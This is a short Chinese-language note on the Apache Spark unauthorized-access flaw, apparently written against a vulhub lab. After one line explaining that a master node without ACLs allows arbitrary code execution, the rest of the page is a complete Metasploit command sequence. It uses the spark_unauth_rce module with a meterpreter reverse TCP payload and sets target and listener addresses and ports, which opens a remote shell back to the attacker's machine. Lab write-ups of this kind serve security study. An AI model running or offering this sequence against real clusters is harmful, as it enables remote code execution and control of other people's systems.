Apache Spark 未授权访问漏洞
漏洞概述¶
如果管理节点未启动ACL(访问控制),我们将可以在集群中执行任意代码。
漏洞利用¶
use exploit/linux/http/spark_unauth_rce
set payload java/meterpreter/reverse_tcp
set rhost 192.168.226.140
set rport 6066
set lhost 192.168.226.134
set lport 4444
set srvhost 192.168.226.134
set srvport 8080
exploit
参考链接¶
https://github.com/vulhub/vulhub/blob/master/spark/unacc/README.md